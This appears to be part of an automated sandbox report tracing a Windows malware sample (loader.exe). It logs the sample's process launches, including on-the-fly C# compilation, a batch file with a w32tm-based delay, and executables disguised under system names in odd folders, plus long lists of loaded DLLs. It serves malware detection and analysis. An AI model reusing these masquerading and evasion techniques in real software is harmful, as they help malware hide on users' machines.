                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\LiveKernelReports\RuntimeBroker.exe "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                    Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\dasHost.exe "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                    Source: unknownProcess created: C:\Recovery\conhost.exe "C:\Recovery\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                    Source: unknownProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                    Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\dasHost.exe "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                    Source: unknownProcess created: C:\Recovery\conhost.exe "C:\Recovery\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: version.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: shfolder.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: api-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: api-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: api-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: dxgidebug.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sfc_os.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: dwmapi.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: iconcodecservice.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: policymanager.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: msvcp110_win.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: pcacli.dllJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: version.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: version.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: version.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: version.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeSection loaded: sspicli.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: mscoree.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: version.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeSection loaded: ucrtbase_clr0400.dll
